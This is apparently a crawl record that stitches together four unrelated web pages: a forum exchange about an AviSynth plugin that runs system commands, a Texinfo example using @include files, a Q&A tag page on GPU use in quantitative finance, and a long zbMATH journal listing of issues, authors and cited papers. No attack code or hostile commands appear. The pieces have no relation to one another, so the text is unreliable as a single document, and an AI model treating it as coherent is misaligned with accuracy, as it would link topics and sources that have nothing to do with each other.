15th July 2012, 21:20 #59 | Link StainlessS HeartlessS Usurer Join Date: Dec 2009 Location: Over the rainbow Posts: 10,155 mg262's run_25_dll_20050616 dll WarpEnterprises (Runs a system command. Simple source in text file, very succinct) __________________ I sometimes post sober. StainlessS@MediaFire ::: AND/OR ::: StainlessS@SendSpace "Some infinities are bigger than other infinities", but how many of them are infinitely bigger ???
16th July 2012, 20:14 #60 | Link
martin53
Registered User
Join Date: Mar 2007
Posts: 407
Quote:
Originally Posted by StainlessS mg262's run_25_dll_20050616 dll WarpEnterprises (Runs a system command. Simple source in text file, very succinct)
hmm, indeed, http://avisynth.org/warpenterprises/...l_20050616.zip could be a close to perfect starting point. Today, it just returns the unchanged clip. This would need some work.
|
|
## Sample File with `@include`
Here is an example of a complete outer Texinfo file with `@include` files within it before running `texinfo-multiple-files-update`, which would insert a main or master menu:
```\input texinfo @c -*-texinfo-*-
@setfilename include-example.info
@settitle Include Example
@setchapternewpage odd
@titlepage
@sp 12
@center @titlefont{Include Example}
@sp 2
@center by Whom Ever
@page
@vskip 0pt plus 1filll
@end titlepage
@ifinfo
@node Top, First, (dir), (dir)
@end ifinfo
@include foo.texinfo
@include bar.texinfo
@include concept-index.texinfo
@summarycontents
@contents
@bye
```
An included file, such as `foo.texinfo', might look like this:
```@node First, Second, , Top
@chapter First Chapter
Contents of first chapter ...
```
The full contents of `concept-index.texinfo' might be as simple as this:
```@node Concept Index, , Second, Top
@unnumbered Concept Index
@printindex cp
```
The outer Texinfo source file for The GNU Emacs Lisp Reference Manual is named `elisp.texi'. This outer file contains a master menu with 417 entries and a list of 41 `@include` files.
|
|
# Tag Info
7
The Pagès-Wilbertz paper is a very good one. To answer more directly to you underlying question that is: "in which quant finance area to use hardware acceleration?"; the points to take into account are: GPU is very good for parallel computations (already underlined in remarks) but bad for memory sharing between the master software and the GPU-hosted ...
2
There are few surveys atm as people are still relatively secretive about it because of the various challenges a production system poses. Actually a major bank even backstepped after some initial efforts. So there is now quite some activity in the field but not so much as the initial hype suggested. You can also try asking in the dedicated Linkedin group. ...
2
You should write some kernel functions in CUDA (Nvidia language) for your matlab code. Arrayfun is quite restrictive and not appropriate. Look at this link http://fr.mathworks.com/help/distcomp/run-cuda-or-ptx-code-on-gpu.html for more details about matlab and parallel computing.
1
There are some restrictions to using arrayfun. You can read the restrictions here. Judging from the error, you cannot use indexes the way you are. You probably have to create separate GPU arrays for $V_{t+1}$ and $V_t$. I suggest that you find similar examples in Matlab's website and try to replicate its functionality. Here is an article with ...
1
It's been a few years since the OP, and GPU usage is much more common. While still experimental, most institutions we talk to are running GPUs in the data center in some capacity. GPUs are good at large aggregations and chewing through large and streaming datasets which translates to things like: x-Valuation Adjustments (xVA) in relation to derivative ...
Only top voted, non community-wiki answers of a minimum length are eligible
|
|
# zbMATH — the first resource for mathematics
## The Journal of Geometric Analysis
Short Title: J. Geom. Anal. Publisher: Springer US, New York, NY; Mathematica Josephina, St. Louis, MO ISSN: 1050-6926; 1559-002X/e Online: http://link.springer.com/journal/volumesAndIssues/12220 Comments: Indexed cover-to-cover
Documents Indexed: 2,166 Publications (since 1991) References Indexed: 2,147 Publications with 52,129 References.
all top 5
#### Latest Issues
31, No. 10 (2021) 31, No. 9 (2021) 31, No. 8 (2021) 31, No. 7 (2021) 31, No. 6 (2021) 31, No. 5 (2021) 31, No. 4 (2021) 31, No. 3 (2021) 31, No. 2 (2021) 31, No. 1 (2021) 30, No. 4 (2020) 30, No. 3 (2020) 30, No. 2 (2020) 30, No. 1 (2020) 29, No. 4 (2019) 29, No. 3 (2019) 29, No. 2 (2019) 29, No. 1 (2019) 28, No. 4 (2018) 28, No. 3 (2018) 28, No. 2 (2018) 28, No. 1 (2018) 27, No. 4 (2017) 27, No. 3 (2017) 27, No. 2 (2017) 27, No. 1 (2017) 26, No. 4 (2016) 26, No. 3 (2016) 26, No. 2 (2016) 26, No. 1 (2016) 25, No. 4 (2015) 25, No. 3 (2015) 25, No. 2 (2015) 25, No. 1 (2015) 24, No. 4 (2014) 24, No. 3 (2014) 24, No. 2 (2014) 24, No. 1 (2014) 23, No. 4 (2013) 23, No. 3 (2013) 23, No. 2 (2013) 23, No. 1 (2013) 22, No. 4 (2012) 22, No. 3 (2012) 22, No. 2 (2012) 22, No. 1 (2012) 21, No. 4 (2011) 21, No. 3 (2011) 21, No. 2 (2011) 21, No. 1 (2011) 20, No. 4 (2010) 20, No. 3 (2010) 20, No. 2 (2010) 20, No. 1 (2010) 19, No. 4 (2009) 19, No. 3 (2009) 19, No. 2 (2009) 19, No. 1 (2009) 18, No. 4 (2008) 18, No. 3 (2008) 18, No. 2 (2008) 18, No. 1 (2008) 17, No. 4 (2007) 17, No. 3 (2007) 17, No. 2 (2007) 17, No. 1 (2007) 16, No. 4 (2006) 16, No. 3 (2006) 16, No. 2 (2006) 16, No. 1 (2006) 15, No. 4 (2005) 15, No. 3 (2005) 15, No. 2 (2005) 15, No. 1 (2005) 14, No. 4 (2004) 14, No. 3 (2004) 14, No. 2 (2004) 14, No. 1 (2004) 13, No. 4 (2003) 13, No. 3 (2003) 13, No. 2 (2003) 13, No. 1 (2003) 12, No. 4 (2002) 12, No. 3 (2002) 12, No. 2 (2002) 12, No. 1 (2002) 11, No. 4 (2001) 11, No. 3 (2001) 11, No. 2 (2001) 11, No. 1 (2001) 10, No. 4 (2000) 10, No. 3 (2000) 10, No. 2 (2000) 10, No. 1 (2000) 9, No. 4 (1999) 9, No. 3 (1999) 9, No. 2 (1999) 9, No. 1 (1999) 8, No. 5 (1998) 8, No. 4 (1998) ...and 33 more Volumes
all top 5
#### Authors
14 Isaev, Alexander 11 Yang, Dachun 10 Chang, Der-Chen E. 10 Fornæss, John Erik 10 Kim, Kang-Tae 9 Duong, Xuan Thinh 9 Forstnerič, Franc 8 D’Angelo, John P. 8 Han, Yongsheng 8 Krantz, Steven George 8 Lu, Guozhen 8 Xiao, Jie 7 Bedford, Eric 7 Chang, Shu-Cheng 7 Harrison, Jenny C. 7 Li, Ji 7 Novikov, Roman G. 7 Sabadini, Irene 7 Weiss, Guido L. 6 Auscher, Pascal 6 Bonami, Aline 6 Diederich, Klas 6 Li, Haizhong 6 Markina, Irina 6 McNeal, Jeffery D. 6 Morgan, Frank 6 Seeger, Andreas 6 Xue, Qingying 6 Yuan, Wen 5 Agler, Jim 5 Ambrosio, Luigi 5 Benedetto, John J. 5 Cheltsov, Ivan Anatol’evich 5 Colombo, Fabrizio 5 Dong, Yuxin 5 Ezhov, Vladimir Vladimirovich 5 Ji, Shanyu 5 Lin, Chincheng 5 Lu, Zhiqin 5 Petersen, Peter V 5 Raich, Andrew S. 5 Schmalz, Gerd 5 Shanmugalingam, Nageswari 5 Taylor, Michael Eugene 5 The Anh Bui 5 Tie, Jingzhi 5 Tien Cuong Dinh 5 Torres, Rodolfo H. 5 Young, Nicholas John 5 Zwonek, Włodzimierz 4 Alías, Luis J. 4 Angella, Daniele 4 Baracco, Luca 4 Barbosa, Ezequiel R. 4 Bisi, Cinzia 4 Brakke, Kenneth A. 4 Carlson, James A. 4 Chakrabarti, Debraj 4 Chen, Xiuxiong 4 Chiu, Hung-Lin 4 Dajczer, Marcos 4 Damek, Ewa 4 de Lima, Henrique F. 4 de Lira, Jorge Herbert Soares 4 Ding, Yong 4 Fernández-Pérez, Arturo 4 Fino, Anna 4 Fu, Siqi 4 Garofalo, Nicola 4 Gaussier, Hervé 4 Gilkey, Peter B. 4 Grafakos, Loukas 4 He, Weiyong 4 Ho, Pak Tung 4 Kenig, Carlos Eduardo 4 Khenkin, Gennadiĭ Markovich 4 Kolesnikov, Alexander V. 4 Koskela, Pekka 4 Kröncke, Klaus 4 Labate, Demetrio 4 Lárusson, Finnur 4 Le Donne, Enrico 4 LeBrun, Claude R. 4 Li, Yuxiang 4 Liu, Liguang 4 McIntosh, Alan 4 Merker, Joël 4 Miatello, Roberto Jorge 4 Ni, Lei 4 Onninen, Jani 4 Palmer, Vicente 4 Peláez, José Ángel 4 Perdomo, Oscar Mario 4 Perry, Peter A. 4 Peters, Han 4 Piccione, Paolo 4 Poletsky, Evgeny A. 4 Polyakov, Peter L. 4 Qiu, Chunhui 4 Ripoll, Jaime Bruck ...and 2,639 more Authors
all top 5
#### Fields
796 Differential geometry (53-XX) 608 Several complex variables and analytic spaces (32-XX) 418 Partial differential equations (35-XX) 403 Global analysis, analysis on manifolds (58-XX) 248 Harmonic analysis on Euclidean spaces (42-XX) 190 Functions of a complex variable (30-XX) 157 Functional analysis (46-XX) 132 Calculus of variations and optimal control; optimization (49-XX) 118 Operator theory (47-XX) 91 Dynamical systems and ergodic theory (37-XX) 74 Algebraic geometry (14-XX) 67 Potential theory (31-XX) 67 Convex and discrete geometry (52-XX) 63 Topological groups, Lie groups (22-XX) 62 Measure and integration (28-XX) 61 Abstract harmonic analysis (43-XX) 59 Manifolds and cell complexes (57-XX) 58 Real functions (26-XX) 42 Probability theory and stochastic processes (60-XX) 30 Integral transforms, operational calculus (44-XX) 25 Geometry (51-XX) 23 Quantum theory (81-XX) 18 Number theory (11-XX) 16 Linear and multilinear algebra; matrix theory (15-XX) 15 Group theory and generalizations (20-XX) 14 Relativity and gravitational theory (83-XX) 13 History and biography (01-XX) 12 Approximations and expansions (41-XX) 12 General topology (54-XX) 12 Numerical analysis (65-XX) 11 Ordinary differential equations (34-XX) 10 Nonassociative rings and algebras (17-XX) 10 Special functions (33-XX) 10 Difference and functional equations (39-XX) 10 Fluid mechanics (76-XX) 9 Combinatorics (05-XX) 9 Commutative algebra (13-XX) 8 Mechanics of deformable solids (74-XX) 7 $$K$$-theory (19-XX) 7 Mechanics of particles and systems (70-XX) 6 Systems theory; control (93-XX) 6 Information and communication theory, circuits (94-XX) 5 Integral equations (45-XX) 5 Algebraic topology (55-XX) 5 Statistical mechanics, structure of matter (82-XX) 3 General and overarching topics; collections (00-XX) 3 Associative rings and algebras (16-XX) 3 Classical thermodynamics, heat transfer (80-XX) 3 Operations research, mathematical programming (90-XX) 2 Sequences, series, summability (40-XX) 2 Optics, electromagnetic theory (78-XX) 2 Biology and other natural sciences (92-XX) 1 Mathematical logic and foundations (03-XX) 1 General algebraic systems (08-XX) 1 Field theory and polynomials (12-XX) 1 Game theory, economics, finance, and other social and behavioral sciences (91-XX)
#### Citations contained in zbMATH Open
1,529 Publications have been cited 11,061 times in 8,907 Documents Cited by Year
Hardy spaces of differential forms on Riemannian manifolds. Zbl 1217.42043
Auscher, Pascal; McIntosh, Alan; Russ, Emmanuel
2008
An inviscid flow with compact support in space-time. Zbl 0836.76017
1993
Intrinsic capacities on compact Kähler manifolds. Zbl 1087.32020
Guedj, Vincent; Zeriahi, Ahmed
2005
Gradient Young measures generated by sequences in Sobolev spaces. Zbl 0808.46046
Kinderlehrer, David; Pedregal, Pablo
1994
A wavelet theory for local fields and related groups. Zbl 1114.42015
Benedetto, John J.; Benedetto, Robert L.
2004
Harmonic analysis on solvable extensions of H-type groups. Zbl 0788.43008
Damek, Ewa; Ricci, Fulvio
1992
On the structure of finite perimeter sets in step 2 Carnot groups. Zbl 1064.49033
Franchi, Bruno; Serapioni, Raul; Serra Cassano, Francesco
2003
Almost periodic Jacobi matrices with homogeneous spectrum, infinite dimensional Jacobi inversion, and Hardy spaces of character-automorphic functions. Zbl 1041.47502
Sodin, Mikhail; Yuditskii, Peter
1997
On gradient Ricci solitons. Zbl 1275.53061
Munteanu, Ovidiu; Sesum, Natasa
2013
A unified characterization of reproducing systems generated by a finite family. II. Zbl 1039.42032
Hernández, Eugenio; Labate, Demetrio; Weiss, Guido
2002
Prescribing Gaussian curvatures on surfaces with conical singularities. Zbl 0739.58012
Chen, Wenxiong; Li, Congming
1991
Motion of level sets by mean curvature. III. Zbl 0768.53003
Evans, L. C.; Spruck, J.
1992
Mean curvature flow through singularities for surfaces of rotation. Zbl 0847.58072
Altschuler, Steven; Angenent, Sigurd B.; Giga, Yoshikazu
1995
Non-homogeneous $$Tb$$ theorem and random dyadic cubes on metric measure spaces. Zbl 1261.42017
Hytönen, Tuomas; Martikainen, Henri
2012
An approach to symmetric spaces of rank one via groups of Heisenberg type. Zbl 0966.53039
Cowling, Michael; Dooley, Anthony; Korányi, Adam; Ricci, Fulvio
1998
On the $$\bar {\partial{}}$$ equation in weighted $$L^ 2$$ norms in $$\mathbb{C} ^ 1$$. Zbl 0737.35011
Christ, Michael
1991
On genericity for holomorphic curves in four-dimensional almost-complex manifolds. Zbl 0911.53014
Hofer, Helmut; Lizan, Véronique; Sikorav, Jean-Claude
1997
The density property for complex manifolds and geometric structures. Zbl 0994.32019
Varolin, Dror
2001
Elliptic equations and systems with subcritical and critical exponential growth without the Ambrosetti-Rabinowitz condition. Zbl 1305.35069
Lam, Nguyen; Lu, Guozhen
2014
Extrapolation of weighted norm inequalities for multivariable operators and applications. Zbl 1049.42007
Grafakos, Loukas; Martell, José María
2004
Weakly monotone functions. Zbl 0805.35013
Manfredi, Juan J.
1994
Intrinsic regular hypersurfaces in Heisenberg groups. Zbl 1085.49045
Ambrosio, Luigi; Serra Cassano, Francesco; Vittone, Davide
2006
The hyperbolic geometry of the symmetrized bidisc. Zbl 1055.32010
Agler, J.; Young, N. J.
2004
A sharp analog of Young’s inequality on $$S^N$$ and related entropy inequalities. Zbl 1056.43002
Carlen, E. A.; Lieb, E. H.; Loss, M.
2004
On some properties of the quaternionic functional calculus. Zbl 1166.47018
2009
Isometrically embedded polydisks in infinite dimensional Teichmüller spaces. Zbl 0963.32004
Earle, Clifford J.; Li, Zhong
1999
Partial regularity for a minimum problem with free boundary. Zbl 0960.49026
Weiss, Georg Sebastian
1999
Singular solutions of fractional order conformal Laplacians. Zbl 1255.53037
del Mar González, Maria; Mazzeo, Rafe; Sire, Yannick
2012
Band-limited localized Parseval frames and Besov spaces on compact homogeneous manifolds. Zbl 1216.43004
Geller, Daryl; Pesenson, Isaac Z.
2011
The X-ray transform for a generic family of curves and weights. Zbl 1148.53055
Frigyik, Bela; Stefanov, Plamen; Uhlmann, Gunther
2008
Solution of two problems on wavelets. Zbl 0843.42015
Auscher, Pascal
1995
Domains in $${\mathbb{C}}^{n+1}$$ with noncompact automorphism group. Zbl 0733.32014
Bedford, Eric; Pinchuk, Sergey
1991
The entropy formula for linar heat equation. Zbl 1044.58030
Ni, Lei
2004
Pseudo-holomorphic maps and bubble trees. Zbl 0759.53023
Parker, Thomas H.; Wolfson, Jon G.
1993
A characterization of the higher dimensional groups associated with continuous wavelets. Zbl 1043.42032
Laugesen, R. S.; Weaver, N.; Weiss, G. L.; Wilson, E. N.
2002
Hardy spaces, regularized BMO spaces and the boundedness of Calderón-Zygmund operators on non-homogeneous spaces. Zbl 1267.42013
Bui, The Anh; Duong, Xuan Thinh
2013
Exposing points on the boundary of a strictly pseudoconvex or a locally convexifiable domain of finite 1-type. Zbl 1312.32006
Diederich, K.; Fornæss, J. E.; Wold, E. F.
2014
The fundamental solution on manifolds with time-dependent metrics. Zbl 1029.58018
Guenther, Christine M.
2002
Gromov hyperbolicity through decomposition of metrics spaces. II. Zbl 1047.30028
Portilla, Ana; Rodríguez, José M.; Touris, Eva
2004
Toeplitz operators on symplectic manifolds. Zbl 1152.81030
Ma, Xiaonan; Marinescu, George
2008
Anisotropic Triebel-Lizorkin spaces with doubling measures. Zbl 1147.42006
Bownik, Marcin
2007
Geometric and transformational properties of Lipschitz domains, Semmes-Kenig-Toro domains, and other classes of finite perimeter domains. Zbl 1142.49021
Hofmann, Steve; Mitrea, Marius; Taylor, Michael
2007
Entropy and reduced distance for Ricci expanders. Zbl 1071.53040
Feldman, Michael; Ilmanen, Tom; Ni, Lei
2005
The second main theorem for moving targets. Zbl 0732.30025
Ru, Min; Stoll, Wilhelm
1991
A Liouville-type theorem for smooth metric measure spaces. Zbl 1263.53027
Brighton, Kevin
2013
Quasiregular maps on Carnot groups. Zbl 0905.30018
Heinonen, Juha; Holopainen, Ilkka
1997
Optimal maps and exponentiation on finite-dimensional spaces with Ricci curvature bounded from below. Zbl 1361.53036
Gigli, Nicola; Rajala, Tapio; Sturm, Karl-Theodor
2016
Jump problem and removable singularities for monogenic functions. Zbl 1211.30056
Abreu-Blaya, Ricardo; Bory-Reyes, Juan; Peña-Peña, Dixan
2007
Motion of level sets by mean curvature. IV. Zbl 0829.53040
Evans, Lawrence C.; Spruck, Joel
1995
Interpolation by holomorphic automorphisms and embeddings in $${\mathbb{C}}^n$$. Zbl 0963.32006
Forstneric, Franc
1999
Integral operators, embedding theorems and a Littlewood-Paley formula on weighted Fock spaces. Zbl 1405.30056
Constantin, Olivia; Peláez, José Ángel
2016
Zeta and eta functions for Atiyah-Patodi-Singer operators. Zbl 0858.58050
Grubb, Gerd; Seeley, Robert T.
1996
The Whitney problem of existence of a linear extension operator. Zbl 0937.58007
Brudnyi, Yuri; Shvartsman, Pavel
1997
Szegö and Bergman projections on non-smooth planar domains. Zbl 1046.30023
Lanzani, Loredana; Stein, Elias M.
2004
On the Bakry-Émery condition, the gradient estimates and the local-to-global property of $$\mathrm{RCD}^*(K,N)$$ metric measure spaces. Zbl 1335.35088
Ambrosio, Luigi; Mondino, Andrea; Savaré, Giuseppe
2016
Pre-schwarzian and Schwarzian derivatives of harmonic mappings. Zbl 1308.31001
Hernández, Rodrigo; Martín, María J.
2015
Some isoperimetric problems in planes with density. Zbl 1193.49050
Cañete, Antonio; Miranda, Michele jun.; Vittone, Davide
2010
Kähler-Ricci soliton typed equations on compact complex manifolds with $$c_1(M)>0$$. Zbl 1036.53054
Zhu, Xiaohua
2000
Reflection ideals and mappings between generic submanifolds in complex space. Zbl 1039.32021
Baouendi, M. S.; Mir, Nordine; Rothschild, Linda Preiss
2002
Quaternionic Monge-Ampère equations. Zbl 1058.32028
Alesker, Semyon
2003
Musielak-Orlicz-Hardy spaces associated with operators and their applications. Zbl 1302.42033
Yang, Dachun; Yang, Sibei
2014
Explicit formulas and global uniqueness for phaseless inverse scattering in multidimensions. Zbl 1338.81361
Novikov, R. G.
2016
Schwarz lemma at the boundary of the unit ball in $$\mathbb C^n$$ and its applications. Zbl 1320.32020
Liu, Taishun; Wang, Jianfei; Tang, Xiaomin
2015
The initial value problem for cohomogeneity one Einstein metrics. Zbl 0992.53033
Eschenburg, J.-H.; Wang, McKenzie Y.
2000
Regular functions of several quaternionic variables and the Cauchy-Fueter complex. Zbl 0966.35088
Adams, W. W.; Berenstein, C. A.; Loustaunau, P.; Sabadini, I.; Struppa, D. C.
1999
Wavelet characterization of weighted spaces. Zbl 0995.42016
García-Cuerva, J.; Martell, J. M.
2001
Generalized low pass filters and MRA frame wavelets. Zbl 0985.42020
Paluszyński, Maciej; Šikić, Hrvoje; Weiss, Guido; Xiao, Shaoliang
2001
Sharp Moser-Trudinger inequalities on hyperbolic spaces with exact growth condition. Zbl 1356.46031
Lu, Guozhen; Tang, Hanli
2016
The critical temperature for the BCS equation at weak coupling. Zbl 1137.82025
Frank, Rupert L.; Hainzl, Christian; Naboko, Serguei; Seiringer, Robert
2007
BMO solvability and the $$A_{\infty}$$ condition for elliptic operators. Zbl 1215.42029
Dindos, Martin; Kenig, Carlos; Pipher, Jill
2011
On the stability of the behavior of random walks on groups. Zbl 0985.60043
Pittet, Ch.; Saloff-Coste, L.
2000
$$L^2$$-harmonic 1-forms on submanifolds with finite total curvature. Zbl 1308.53056
Cavalcante, Marcos Petrúcio; Mirandola, Heudson; Vitório, Feliciano
2014
Dynamics of rational surface automorphisms: linear fractional recurrences. Zbl 1185.37128
Bedford, Eric; Kim, Kyounghee
2009
Recent work on sharp estimates in second-order elliptic unique continuation problems. Zbl 0787.35017
Wolff, Thomas H.
1993
Locally conformally flat Lorentzian gradient Ricci solitons. Zbl 1285.53059
Brozos-Vázquez, M.; García-Río, E.; Gavino-Fernández, S.
2013
Plurisubharmonic functions on hypercomplex manifolds and HKT-geometry. Zbl 1106.32023
Alesker, Semyon; Verbitsky, Misha
2006
Pointwise estimates for the Bergman kernel of the weighted Fock space. Zbl 1183.30058
Marzo, Jordi; Ortega-Cerdà, Joaquim
2009
Classes of singular integral operators along variable lines. Zbl 0964.42003
Carbery, Anthony; Seeger, Andreas; Wainger, Stephen; Wright, James
1999
A characterization of wavelets on general lattices. Zbl 1057.42025
Calogero, A.
2000
Hankel operators on Fock spaces and related Bergman kernel estimates. Zbl 1275.47063
Seip, Kristian; Youssfi, El Hassan
2013
Effective $$L_p$$ pinching for the concircular curvature. Zbl 0902.53031
Hebey, Emmanuel; Vaugon, Michel
1996
Differentiability of intrinsic Lipschitz functions within Heisenberg groups. Zbl 1234.22002
Franchi, Bruno; Serapioni, Raul; Serra Cassano, Francesco
2011
Sobolev inequalities for differential forms and $$L_{q,p}$$-cohomology. Zbl 1105.58008
2006
Mass transport and variants of the logarithmic Sobolev inequality. Zbl 1170.46031
Barthe, Franck; Kolesnikov, Alexander V.
2008
On the degree growth of birational mappings in higher dimension. Zbl 1067.37054
Bedford, Eric; Kim, Kyounghee
2004
On four-dimensional anti-self-dual gradient Ricci solitons. Zbl 1322.53041
Chen, Xiuxiong; Wang, Yuanqi
2015
A Hardy space for Fourier integral operators. Zbl 1031.42020
Smith, Hart F.
1998
Stable solutions of elliptic equations on Riemannian manifolds. Zbl 1273.53029
Farina, Alberto; Sire, Yannick; Valdinoci, Enrico
2013
A Schwarz lemma for a domain related to $$\mu$$-synthesis. Zbl 1149.30020
Abouhajar, A. A.; White, M. C.; Young, N. J.
2007
Density of weighted wavelet frames. Zbl 1029.42031
Heil, Christopher; Kutyniok, Gitta
2003
Atomic and Littlewood-Paley characterizations of anisotropic mixed-norm Hardy spaces and their applications. Zbl 1420.42018
Huang, Long; Liu, Jun; Yang, Dachun; Yuan, Wen
2019
Rotationally invariant hypersurfaces with constant mean curvature in the Heisenberg group $$\mathbb H^n$$. Zbl 1129.53041
Ritoré, Manuel; Rosales, César
2006
An explicit computation of the Bergman kernel function. Zbl 0794.32021
D’Angelo, John P.
1994
Area minimizing sets subject to a volume constraint in a convex set. Zbl 0940.49025
Stredulinsky, Edward; Ziemer, William P.
1997
Approximation by spherical waves in $$L^p$$-spaces. Zbl 0898.44003
Agranovsky, Mark; Berenstein, Carlos; Kuchment, Peter
1996
On the number of singularities for the obstacle problem in two dimensions. Zbl 1041.35093
Monneau, R.
2003
Poincaré-type inequalities and reconstruction of Paley-Wiener functions on manifolds. Zbl 1080.42024
Pesenson, Isaac
2004
The Bergman projection as a singular integral operator. Zbl 0804.32015
McNeal, Jeffery D.
1994
Positivity for a strongly coupled elliptic system by Green function estimates. Zbl 0792.35048
Sweers, Guido
1994
Balls have the worst best Sobolev inequalities. Zbl 1086.46021
Maggi, Francesco; Villani, Cédric
2005
Boundedness of differential transforms for one-sided fractional Poisson-type operator sequence. Zbl 1460.42013
Chao, Zhang; Ma, Tao; Torrea, José L.
2021
Quantitative weighted estimates for Rubio de Francia’s Littlewood-Paley square function. Zbl 07327664
Garg, Rahul; Roncal, Luz; Shrivastava, Saurabh
2021
Infinite-dimensional Carnot groups and Gâteaux differentiability. Zbl 07328181
Le Donne, Enrico; Li, Sean; Moisala, Terhi
2021
Families of exposing maps in strictly pseudoconvex domains. Zbl 1460.32068
2021
Geometric pluripotential theory on Sasaki manifolds. Zbl 1465.53063
He, Weiyong; Li, Jun
2021
Optimal extensions of conformal mappings from the unit disk to cardioid-type domains. Zbl 1462.30017
Xu, Haiqing
2021
Delta invariants of singular del Pezzo surfaces. Zbl 1462.14039
Cheltsov, Ivan; Park, Jihun; Shramov, Constantin
2021
Stability of ALE Ricci-flat manifolds under Ricci flow. Zbl 07328222
Deruelle, Alix; Kröncke, Klaus
2021
The light ray transform in stationary and static Lorentzian geometries. Zbl 07343473
Feizmohammadi, Ali; Ilmavirta, Joonas; Oksanen, Lauri
2021
Volume estimates and classification theorem for constant weighted mean curvature hypersurfaces. Zbl 07343477
Ancari, Saul; Miranda, Igor
2021
Index of equivariant Callias-type operators and invariant metrics of positive scalar curvature. Zbl 07327637
Guo, Hao
2021
A characterization of homogeneous holomorphic two-spheres in $$Q_n$$. Zbl 1462.53056
Fei, Jie; Wang, Jun
2021
The Fourier transform on harmonic manifolds of purely exponential volume growth. Zbl 1465.53060
Biswas, Kingshook; Knieper, Gerhard; Peyerimhoff, Norbert
2021
Connected sum of CR manifolds with positive CR Yamabe constant. Zbl 1460.32078
Cheng, Jih-Hsin; Chiu, Hung-Lin; Ho, Pak Tung
2021
Long time existence for the bosonic membrane in the light cone gauge. Zbl 1461.35150
Yan, Weiping; Zhang, Binlin
2021
Maximal factorization of operators acting in Köthe-Bochner spaces. Zbl 07327658
Calabuig, J. M.; Fernández-Unzueta, M.; Galaz-Fontes, F.; Sánchez-Pérez, E. A.
2021
Weak Hardy-type spaces associated with ball quasi-Banach function spaces. II: Littlewood-Paley characterizations and real interpolation. Zbl 1460.42033
Wang, Songbai; Yang, Dachun; Yuan, Wen; Zhang, Yangyang
2021
Atomic decomposition and Carleson measures for weighted mixed norm spaces. Zbl 07327663
Peláez, José Ángel; Rättyä, Jouni; Sierra, Kian
2021
Improved bounds for Hermite-Hadamard inequalities in higher dimensions. Zbl 1462.26022
Beck, Thomas; Brandolini, Barbara; Burdzy, Krzysztof; Henrot, Antoine; Langford, Jeffrey J.; Larson, Simon; Smits, Robert; Steinerberger, Stefan
2021
A multifractal formalism for Hewitt-Stromberg measures. Zbl 1462.28003
Attia, Najmeddine; Selmi, Bilel
2021
Killing forms on 2-step nilmanifolds. Zbl 07327669
del Barco, Viviana; Moroianu, Andrei
2021
Multipeak solutions for the Yamabe equation. Zbl 1460.35144
Rey, Carolina A.; Ruiz, Juan Miguel
2021
Self-adjoint local boundary problems on compact surfaces. I: Spectral flow. Zbl 1460.35125
Prokhorova, Marina
2021
Bochner-Simons formulas and the rigidity of biharmonic submanifolds. Zbl 1467.53065
Fetcu, Dorel; Loubeau, Eric; Oniciuc, Cezar
2021
The $$\bar{\partial}$$-equation, duality, and holomorphic forms on a reduced complex space. Zbl 07328182
Samuelsson Kalm, Håkan
2021
A gradient flow of isometric $$\text{G}_2$$-structures. Zbl 07328184
Dwivedi, Shubham; Gianniotis, Panagiotis; Karigiannis, Spiro
2021
Multipoint formulas for phase recovering from phaseless scattering data. Zbl 07328186
Novikov, R. G.
2021
Short-time heat content asymptotics via the wave and eikonal equations. Zbl 1461.53027
Schilling, Nathanael
2021
Sharp Cheeger-buser type inequalities in $$\mathsf{RCD}(K,\infty)$$ spaces. Zbl 07328207
De Ponti, Nicolò; Mondino, Andrea
2021
Hardy-type inequalities for the Carnot-Carathéodory distance in the Heisenberg group. Zbl 07328209
Franceschi, Valentina; Prandi, Dario
2021
Classic and exotic Besov spaces induced by good grids. Zbl 07328210
Smania, Daniel
2021
Higher Lelong numbers and convex geometry. Zbl 1460.32073
Kim, Dano; Rashkovskii, Alexander
2021
A hypersurface containing the support of a Radon transform must be an ellipsoid. I: The symmetric case. Zbl 07328219
Boman, Jan
2021
On the composition of rough singular integral operators. Zbl 1460.42017
Hu, Guoen; Lai, Xudong; Xue, Qingying
2021
Quantisation of extremal Kähler metrics. Zbl 1460.32048
Hashimoto, Yoshinori
2021
Hyperbolic metrics on surfaces with boundary. Zbl 1462.30081
Rupflin, Melanie
2021
Asymptotic behaviours in fractional Orlicz-Sobolev spaces on Carnot groups. Zbl 07328234
Capolli, M.; Maione, A.; Salort, A. M.; Vecchi, E.
2021
Singular doubly nonlocal elliptic problems with Choquard type critical growth nonlinearities. Zbl 07343416
Giacomoni, Jacques; Goel, Divya; Sreenadh, K.
2021
Stable components in the parameter plane of transcendental functions of finite type. Zbl 1466.37039
Fagella, Núria; Keen, Linda
2021
On asymptotically sharp bi-Lipschitz inequalities of quasiconformal mappings satisfying inhomogeneous polyharmonic equations. Zbl 1462.30043
Chen, Shaolin; Kalaj, David
2021
Rigidity of minimal submanifolds in space forms. Zbl 1466.53069
Chen, Hang; Wei, Guofang
2021
Compactness and finiteness theorems for rotationally symmetric self shrinkers. Zbl 1467.53103
Mramor, Alexander
2021
Bounded geometry and $$p$$-harmonic functions under uniformization and hyperbolization. Zbl 1466.53048
Björn, Anders; Björn, Jana; Shanmugalingam, Nageswari
2021
On generalizations of Fatou’s theorem in $$L^p$$ for convolution integrals with general kernels. Zbl 1462.42032
Safaryan, M. H.
2021
Ricci de Turck flow on singular manifolds. Zbl 07343465
Vertman, Boris
2021
The area preserving Willmore flow and local maximizers of the Hawking mass in asymptotically Schwarzschild manifolds. Zbl 07343467
Koerber, Thomas
2021
Isoperimetric inequalities in Riemann surfaces and graphs. Zbl 07343471
Martínez-Pérez, Álvaro; Rodríguez, José M.
2021
Maximum principles for $$k$$-Hessian equations with lower order terms on unbounded domains. Zbl 1462.35109
Bhattacharya, Tilak; Mohammed, Ahmed
2021
Sharp reverse Hölder inequality for $$C_p$$ weights and applications. Zbl 1462.42028
Canto, Javier
2021
Stability of the spacetime positive mass theorem in spherical symmetry. Zbl 1466.83022
Bryden, Edward; Khuri, Marcus; Sormani, Christina
2021
Conformal metrics with prescribed fractional scalar curvature on conformal infinities with positive fractional Yamabe constants. Zbl 07343494
Kim, Seunghyeok
2021
Splitting lemma for biholomorphic mappings with smooth dependence on parameters. Zbl 07379186
2021
The Haar system in Triebel-Lizorkin spaces: endpoint results. Zbl 07388953
Garrigós, Gustavo; Seeger, Andreas; Ullrich, Tino
2021
On the regularity of minima of non-autonomous functionals. Zbl 1437.35292
De Filippis, Cristiana; Mingione, Giuseppe
2020
Manifold constrained non-uniformly elliptic problems. Zbl 1437.49008
De Filippis, Cristiana; Mingione, Giuseppe
2020
Smoothness in the $$L_p$$ Minkowski problem for $$p<1$$. Zbl 1445.52005
